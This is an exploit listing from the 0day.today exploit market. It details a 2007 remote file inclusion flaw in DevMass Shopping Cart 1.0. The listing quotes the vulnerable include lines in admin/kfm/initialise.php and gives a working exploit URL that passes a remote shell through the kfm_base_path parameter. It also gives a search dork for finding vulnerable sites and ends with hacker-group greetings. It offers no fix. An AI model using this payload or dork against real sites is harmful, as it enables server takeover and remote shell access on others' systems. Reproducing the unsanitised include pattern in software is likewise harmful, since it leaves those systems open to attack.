[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

DevMass Shopping Cart <= 1.0 Remote File Include Vulnerability

Author
S.W.A.T.
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2300
Category
web applications
Date add
22-11-2007
Platform
unsorted
==============================================================
DevMass Shopping Cart <= 1.0 Remote File Include Vulnerability
==============================================================




========================================================================
||  ##    ##   ##           ##########   #######     ########         ||
||   ##  ##    ##########   ##########   ##   ##     ##               ||
||    ####     ##########   ##      ##   #######     ########         ||
||    ####     ##  ##  ##   ##      ##   #######           ##         ||
||   ##  ##    ##  ##  ##   ##########   ##    ##          ##         ||
||  ##    ##   ##  ##  ##   ##########   ##     ##   ########         ||
========================================================================
========================================================================
[*] DevMass Shopping Cart <= 1.0 Remote File Include Vulnerability    ||
[!] Download   : http://www.devmass.com/downloads/devmass.cart.1.0.tar||
[!] Author     : S.W.A.T.                                             ||
[!] Y!ID       : Svvateam                                             ||
[!] Location   : Iran - 071                                           ||
[!] Risk       : Moderate ( High )                                    ||
[!] Dork       : DevMass Shopping Cart                                ||
========================================================================
========================================================================
Vuln. code: admin/kfm/initialise.php            	              ||
                                                                      ||
require $kfm_base_path.'includes/lang.php'; 			      ||
require $kfm_base_path.'includes/db.php'; 			      ||
require $kfm_base_path.'includes/object.class.php';	   	      ||
require $kfm_base_path.'includes/session.class.php'; 		      ||
require $kfm_base_path.'includes/file.class.php'; 		      ||
require $kfm_base_path.'includes/image.class.php'; 		      ||
require $kfm_base_path.'includes/directory.class.php';                ||
                                                                      ||
                                                                      ||
========================================================================
[*] Exploitation :                                                    ||
                                                                      ||
[target]/[path]/admin/kfm/initialise.php?kfm_base_path=[Shell]        ||
								      ||
========================================================================
[!] We Are : Scorpiunix - Kamy4r - S.W.A.T. - D3vil_B0Y_Ir -          ||
[!] The_Editor - Silliconic - Sh3llH3ll                               ||
                                                                      ||
[!] I Love Xmors & All Member Of Them                                 ||
							              ||
[!] DeltaHackingGroup = ( Lammers Group :D ) ,,!,,                    ||
							              ||
[!] Special Thanks To : Dj7xpl From Y! UnderGround Group              ||
								      ||
========================================================================


#  0day.today [2024-11-15]  #